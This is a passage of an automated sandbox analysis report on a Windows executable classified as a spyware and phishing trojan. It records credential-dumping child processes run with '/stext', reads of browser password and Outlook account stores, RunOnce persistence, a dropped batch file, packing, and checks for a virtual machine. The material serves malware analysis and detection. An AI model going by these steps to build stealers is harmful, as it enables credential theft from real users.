              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004398D84_2_004398D8
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004498E04_2_004498E0
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0044A8864_2_0044A886
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0043DA094_2_0043DA09
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00438D5E4_2_00438D5E
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00449ED04_2_00449ED0
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0041FE834_2_0041FE83
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00430F544_2_00430F54
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004050C25_2_004050C2
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004014AB5_2_004014AB
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004051335_2_00405133
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004051A45_2_004051A4
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004012465_2_00401246
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_0040CA465_2_0040CA46
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004052355_2_00405235
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004032C85_2_004032C8
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004222D95_2_004222D9
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004016895_2_00401689
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00402F605_2_00402F60
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: String function: 00416760 appears 69 times
              Source: 2T10XBqS6g.exe, 00000002.00000003.29879783492.0000000002959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exe, 00000002.00000003.29917954698.000000000296E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exe, 00000002.00000003.29917676178.0000000002969000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exe, 00000002.00000002.30678074728.0000000033A1B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exe, 00000002.00000003.29917433812.0000000002969000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exe, 00000002.00000003.29917547483.00000000331DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exeBinary or memory string: OriginalFileName vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exeBinary or memory string: OriginalFilename vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exe, 00000005.00000002.29883097012.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 2T10XBqS6g.exe
              Source: 2T10XBqS6g.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/13@3/3
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,3_2_004182CE
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00403645 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,5_2_00410DE1
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,0_2_00404AF2
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,3_2_00413D4C
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_004021AF LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,0_2_004021AF
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,3_2_0040B58D
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile created: C:\Users\user\eftermodnendesJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile created: C:\Users\user\AppData\Local\Temp\nsg374C.tmpJump to behavior
              Source: 2T10XBqS6g.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000004.00000002.29881343409.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: 2T10XBqS6g.exe, 00000002.00000002.30677721055.0000000033910000.00000040.10000000.00040000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: 2T10XBqS6g.exe, 00000003.00000003.29911533073.0000000002B11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: 2T10XBqS6g.exe, 00000003.00000002.29915367921.0000000002B12000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29912441543.0000000002B11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: 2T10XBqS6g.exe, 00000003.00000003.29909980262.0000000002B11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: 2T10XBqS6g.exeVirustotal: Detection: 33%
              Source: 2T10XBqS6g.exeReversingLabs: Detection: 31%
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile read: C:\Users\user\Desktop\2T10XBqS6g.exeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_4-33208
              Source: unknownProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe "C:\Users\user\Desktop\2T10XBqS6g.exe"
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe "C:\Users\user\Desktop\2T10XBqS6g.exe"
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\nvdplctrijrfvwgugtzctlhghmlwqfpj"
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\qxrz"
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\arwsnnw"
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe "C:\Users\user\Desktop\2T10XBqS6g.exe"Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\nvdplctrijrfvwgugtzctlhghmlwqfpj"Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\qxrz"Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess created: C:\Users\user\Desktop\2T10XBqS6g.exe C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\arwsnnw"Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\Desktop\2T10XBqS6g.cfgJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: 2T10XBqS6g.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000649000.00000020.00000001.01000000.00000006.sdmp
              Source: Binary string: mshtml.pdbUGP source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000649000.00000020.00000001.01000000.00000006.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeUnpacked PE file: 3.2.2T10XBqS6g.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeUnpacked PE file: 4.2.2T10XBqS6g.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeUnpacked PE file: 5.2.2T10XBqS6g.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: 00000000.00000002.29608235875.0000000003320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_70251BFF LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70251BFF
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_702530C0 push eax; ret 0_2_702530EE
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A41219 push esp; iretd 2_2_33A4121A
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A32806 push ecx; ret 2_2_33A32819
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0A4
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0CC
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00451D34 push eax; ret 4_2_00451D41
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00444E71 push ecx; ret 4_2_00444E81
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00414060 push eax; ret 5_2_00414074
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00414060 push eax; ret 5_2_0041409C
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00414039 push ecx; ret 5_2_00414049
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_004164EB push 0000006Ah; retf 5_2_004165C4
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00416553 push 0000006Ah; retf 5_2_004165C4
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00416555 push 0000006Ah; retf 5_2_004165C4
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile created: C:\Users\user\AppData\Local\Temp\tissedes\Hovedrevisorat.batJump to dropped file
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile created: C:\Users\user\AppData\Local\Temp\nsb3903.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile created: C:\Users\user\AppData\Local\Temp\tissedes\Hovedrevisorat.batJump to dropped file
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Gisne212Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Gisne212Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Gisne212Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Gisne212Jump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004047CB
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeAPI/Special instruction interceptor: Address: 35F8841
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeAPI/Special instruction interceptor: Address: 1A48841
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
